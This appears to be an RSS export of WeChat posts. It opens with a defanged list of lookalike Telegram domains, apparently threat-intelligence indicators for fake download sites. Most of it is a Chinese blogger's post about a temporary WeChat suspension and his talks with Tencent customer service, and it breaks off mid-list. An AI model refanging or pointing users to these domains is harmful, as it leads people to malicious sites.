ww[.]telegdm[.]com<br/>www[.]telegramaz[.]com<br/>telegram-china[.]org<br/>telegramgg[.]com<br/>www[.]telegvam[.]com<br/>88smgmt1zh2105738[.]telegramwindows[.]xyz<br/>www[.]telegram-zw[.]com<br/>www[.]telegramgh[.]com<br/>www[.]telegramgi[.]com<br/>www[.]telegrampv[.]com<br/>www[.]telegmn[.]com<br/>telegramapp[.]io<br/>www[.]fj-telegram[.]com<br/>x1eq1kyc5k10454[.]telegramwindows[.]xyz<br/>telegramav[.]com<br/>www[.]telegramnc[.]com<br/>www[.]telegron[.]com<br/>www[.]telegram-fj[.]com<br/>download[.]telegramm[.]wang<br/>telegrems[.]wixsite[.]com<br/>telemetr[.]io<br/>app[.]cntanghuang[.]com<br/>telegramcp[.]com<br/>x-telegram[.]app<br/>telegramab[.]com<br/>telegramct[.]com<br/>sipins[.]com<br/>tleamsc[.]com<br/>tgcn[.]cash<br/>app[.]telegramam[.]org<br/>telegram-fj[.]com<br/>wwv[.]telegranyy[.]com<br/>telegramorg[.]cn<br/>www[.]telegramtk[.]com<br/>telogarm[.]cc<br/>qqjiik1slv8105558[.]telegrammacos[.]xyz<br/>teleggam[.]com<br/>4tewded[.]oss-cn-hongkong[.]aliyuncs[.]com<br/>telegkm[.]com<br/>telegramapp[.]tv<br/>www[.]telegramdg[.]com<br/>www[.]telegramgb[.]com<br/>www[.]telesun[.]org<br/>www[.]telegramml[.]com<br/></code></pre></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484927">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=785a766b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247484927%26idx%3D1%26sn%3D564fd831cd7856768b7b3100db5b8f88%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 17 Mar 2023 08:58:00 +0800</pubDate>
    </item>
    <item>
      <title>金牌黑客的故事</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247484715&amp;idx=1&amp;sn=d6936b23f48f597d2f2389f6d956e171</link>
      <description>旧文改后重发，剧情无新增，不必点。</description>
      <content:encoded><![CDATA[<p>
原创 <span>冤种王小明</span> <span>2023-03-12 07:30</span> <span style="display: inline-block;">北京</span>
</p>

<p>旧文改后重发，剧情无新增，不必点。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=8fa1ffa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnwIXdbQeamQ7KOAibI1EB97QXk1RRF2HE4vsY2QGibs5CSoyQSoYnnOsw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding: 0 10px;line-height: 1.6;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;word-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#39;PingFang SC&#39;, Cambria, Cochin, Georgia, Times, &#39;Times New Roman&#39;, serif;"><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">----------------劝退线----------------</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">纯纯原文重发，没有任何新增技术细节之类的信息。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">-----------------劝退线------------------</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Hi all，吃了没。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">上一篇文章要被删除了，不是腾讯要把它河蟹掉，<strong style="font-weight: bold;color: black;">是我自己将把它删除</strong>，就在今天的7点30分。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">一句话概括删帖原因：我认可腾讯客服联系到我进行解释后的<strong style="font-weight: bold;color: black;">部分说法</strong>，且出于人道主义<strong style="font-weight: bold;color: black;">不想给同为打工人的两位客服添麻烦</strong>。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">周五下午腾讯客服联系到我之后，向我解释了几个问题，并且提到我的文中有多处描述失实、涉及伤害腾讯客服形象的地方。我考虑之后感觉前文中描述的<strong style="font-weight: bold;color: black;">部分内容确实存在造成误解的可能性</strong>，认为有必要澄清一下，遂在这里特地为之前文中我鹅客服相关的问题做一些说明，并把之前的文章改了重发。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">这本来就是个吃瓜爽文，没什么技术含量，奈何写的臭还长，占用大家太多时间了。说这是小学生流水账我完全理解，毕竟按照一般的安全媒体文章的节奏来说，花大把时间看我这篇烂梗小说几乎没什么ROI可言。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>先说误解</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">不耽误大家时间，这回不啰嗦了我提炼一下，昨天腾讯客服向我表述的几个误解点在这里澄清。此处我的原则是：<strong style="font-weight: bold;color: black;">虽然有些争议点我有我的道理，但是只要你说的有一定道理，我就认可。<br/></strong></p><br/></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>1. 我被封号的原因？</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong> 我被封号是因为转发的内容里有未打码的恶意内容。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">未打码的内容触发风控规则，导致了我的账号封禁。虽然我的主观意图是显摆显摆、科普科普，但是客观的风控规则就是这么设计的，这是昨天告知我的。</section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/><strong>2. 腾讯客服有没有人工客服入口？</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>腾讯客服是有人工客服入口的。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">这是昨天客服妹子多次阐述 “我的文章存在失实描述” 的重要论据，翻译成人话就是：我最终不还是打通了电话跟人工客服建立联系了么，证明现实世界确实是存在腾讯人工客服入口的，所以怎么能说腾讯客服电话没有人工客服入口呢？</section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/><strong>3. 小程序、公众号这些渠道有没有人工客服入口？</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>小程序、公众号这些渠道是有设置人工客服入口的。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">同上，现实世界存在。</section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/><strong>4. 微博超话里腾讯客服私聊我了么？</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>也许私聊了，但我可以认同腾讯客服说当时在微博私聊了我这一观点。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">这是相当吊诡的一部分，也是我决定解释的主要动力之一，因为这是唯一能让我看到证据的一个论据，可信度比较高，不是你的锅我不会让你背。<br/></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">客服妹子准备非常充分，在微信给我发了腾讯客服在微博私聊我的截图，但是我看了一下发现第一条私聊我的信息当时确实没有收到，朋友说未互关的微博账号私信有可能会丢，但是遵循上文提到的诚意原则，我认可客服的证据。<br/></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">后来我翻了翻我的截图，很可惜不能直接证明我确实没有收到第一条私聊（客服妹子也不太信任我这个说法），这个后面再解释。</section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/><strong>5. 为什么打了很多次才有人工入口？</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>客服的解释是在客服电话忙碌的时候确实是不容易打进去人工客服的。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">我没闲工夫去找一批手机号打腾讯客服统计下平均接入次数，所以无法确认这个说法是否是诡辩，像这种我无法验证的说辞在本次事件里一律算你对。</section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/><strong>6. 当天客服电话中为什么不接受我的解释，且当时不告诉我封号的原因？</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>客服（昨天）的解释是这是一个正在处理的事件，存在我是骗子同伙的可能性，所以不解封、不告知原因。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">if 没办法验证，true。</section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/><strong>7. 当时最后联系我的人是谁？</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>是“捞回”我的人。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">照客服解释的意思，最后跟我通话的人（我提到的类似组长角色）与之前的不同，是系统检测到一个人打了很多次电话之后，避免解决不了问题“回捞”的设定。<br/></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>8. ’XX大的客服‘ 这种描述带有黑化倾向，感到很委屈。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>OK，改掉。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">“还有文章标题跟微博的截图”，OK，也可以改。</section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/><strong>9. 腾讯客服是否认可我电话中所表达的 “文中误会均是在客观遭遇下的主观认知，我没有任何主动且恶意的夸大、扭曲、抹黑腾讯客服的表述” 这一观点？</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>概括下来客服妹子基本认可，虽然不太情愿。客服老哥认可。</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">有录音。</section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/><strong>10. 我被封了多久，解没解开？（本条五毛）</strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><strong>封了三天，封的是功能（群聊、朋友圈、企业微信联系人）；三天之期到了后自动解开的。<br/></strong></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">这条内容是客服妹子侧面提到的，不是主要矛盾，我心肠好特地为我鹅鸣冤，所以本条收五毛。文中其实也有提到 “三天安详” 等描述，其次我被封号警告的图片里也明确写了解封的时间，可能没有特地说明加上文章太长，评论区有些朋友以为我是被永久封禁了，特此说明一下。<br/></section><section style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">客服妹子提到两次 “对我只是封三天、且只是封了功能警告一下”，我不知道她言外之意是这也没啥还是想说我文章有误导。我记得在哪看到大概意思是封禁是有次数的，所以我的理解是我账号的 “一条命” 是被风控吃掉了，很亏，下回再倒霉一次会不会又说我多次违规，我号会不会就彻底没了。</section><section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding: 0 10px;line-height: 1.6;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;word-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#39;PingFang SC&#39;, Cambria, Cochin, Georgia, Times, &#39;Times New Roman&#39;, serif;"><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>再讲讲过程</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">你们一般人没有被腾讯客服追着打电话的经历吧，嗨嗨，哥们我昨天就被追着打了。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5625" data-s="300,640" style="" data-type="png" data-w="320" src="https://wechat2rss.xlab.app/img-proxy/?k=74606a28&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn0IANTibVTz5pmzfTnsfUNtFBQGnUWDWvxmym3x0cMgfnrRA8GrD4mPw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我能接受的方案不被认可，那我就听你们的，不过我要整个新活。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">可以理解为简单的公关解读，前前后后电话打了一个多小时，就不写太全了，也没什么恶意，虽然还是流水账，我主要讲点我觉得有意思的地方。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>我<span style="display: none;"></span></h3><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">1. 文章能发出来且能一直活着，说明你不是那种别人说点啥你就直接删帖的坏🐧，感谢你愿意接纳批评和指责的声音，我的🐧。</p><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/></p><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">2. 客服一共打了5次电话，前两次在12:06和12:08，感觉应该是是考虑到了工作日的休息时间，但是我忙于干饭没接到。感谢为我着想，我的🐧。</p><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/></p><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">3. 比较有意思的是我后来注意到，两个未接来电是我的两个手机号，虽然两个手机号微信里面都有用过，但是微信只能绑定一个手机号。just职业原因敏感一下，只说现象不说结论。</p><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/></p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">4. 第3次电话是14:10分，中午刚打完球回工地没几分钟，回去的路上我看到两个深圳未接来电以为是我的招行客户经理，因为银行卡一直用的多年前我🐧TSRC发的那张比较装B的银行卡，开户行在深圳一直没改，聚益生金快到期的时候她有时会打电话过来帮我预约额度，就没当回事。</section><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/></p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;font-size: 16px;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;">5. 第3次电话打过来，表明身份是腾讯客服之后，我以为单纯是想向我解释下那天的事情，但是客服妹子说大概会耽误您30到40分钟，我有点震惊，干啥需要这么长时间啊...</section><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><br/>6. 第一反应是想拒绝的，一方面周五下午事贼多，匀给她半小时成本还是比较高的另一方面我人在工地，旁边十几位工友竖着耳朵👂听呢，在工地当众接这种电话有点内个。</section><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><br/>7. 但我也有不拒绝的理由，我好奇。就像因为单纯好奇会有多疼我选择试了试有痛肠镜胃镜，我好奇这将是一场什么样的谈话，好奇我这种级别的垃圾文章也值得公关么，好奇她为什么来找我。</section><p><br/></p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">8. 说实话个人认为单纯说个倒霉事，回溯下自己的弃子体验，讲个智取小学生的故事，就这么点浏览量以及这种描述程度都能把客服引来，我是真真没想到的。</section><p><br/></p><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">9. 从头到尾没有想过指着蹭我🐧的热度赚点什么热度、浏览量，或者以此给客服舆论施压怎样怎样，麻烦看下历史文章，年更Up啊喂，写写单纯图一乐好么。</section><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><br/>10. 但是，一碗粉就是一碗粉，多了我不要，少了我也不乐意。</section><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>客服妹子<span style="display: none;"></span></h3><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">1. 开始沟通后确认我的身份，定位到了具体微博账号和私信、公众号文章、电话次数等等，听得出来把我这件事当成了单独的case，做了很多的准备。</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">2. 